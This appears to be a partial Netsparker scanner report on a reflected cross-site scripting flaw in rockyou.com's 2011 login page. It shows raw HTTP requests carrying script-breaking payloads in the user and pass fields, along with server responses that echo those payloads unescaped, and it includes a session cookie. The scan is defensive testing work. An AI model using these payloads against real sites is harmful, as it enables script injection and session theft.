setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x000EA4)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x000EA4)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913&quo..
Date: Mon, 18 Apr 2011 22:10:22 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:10:22 GMT; path=/; domain=.rockyou.com,lastlogin=1303164622; expires=Wed, 27-Jul-2011 22:10:22 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:10:22 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=96126 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9052
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x000EA4)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x000EA4)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913&quo..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| user | POST | 3 |
| mode | POST | login |
| pass | POST | '"--></style></script><script>alert(0x000EEC)</script> |
Request
POST /login.php?lang=en HTTP/1.1
Referer: http://www.rockyou.com/login.php?lang=en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164648; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user=3&mode=login&pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000EEC)%3c%2fscript%3e
Referer: http://www.rockyou.com/login.php?lang=en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164648; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user=3&mode=login&pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000EEC)%3c%2fscript%3e
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:10:48 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:10:48 GMT; path=/; domain=.rockyou.com,lastlogin=1303164648; expires=Wed, 27-Jul-2011 22:10:48 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:10:48 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=92287 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9046
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x000EEC)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option 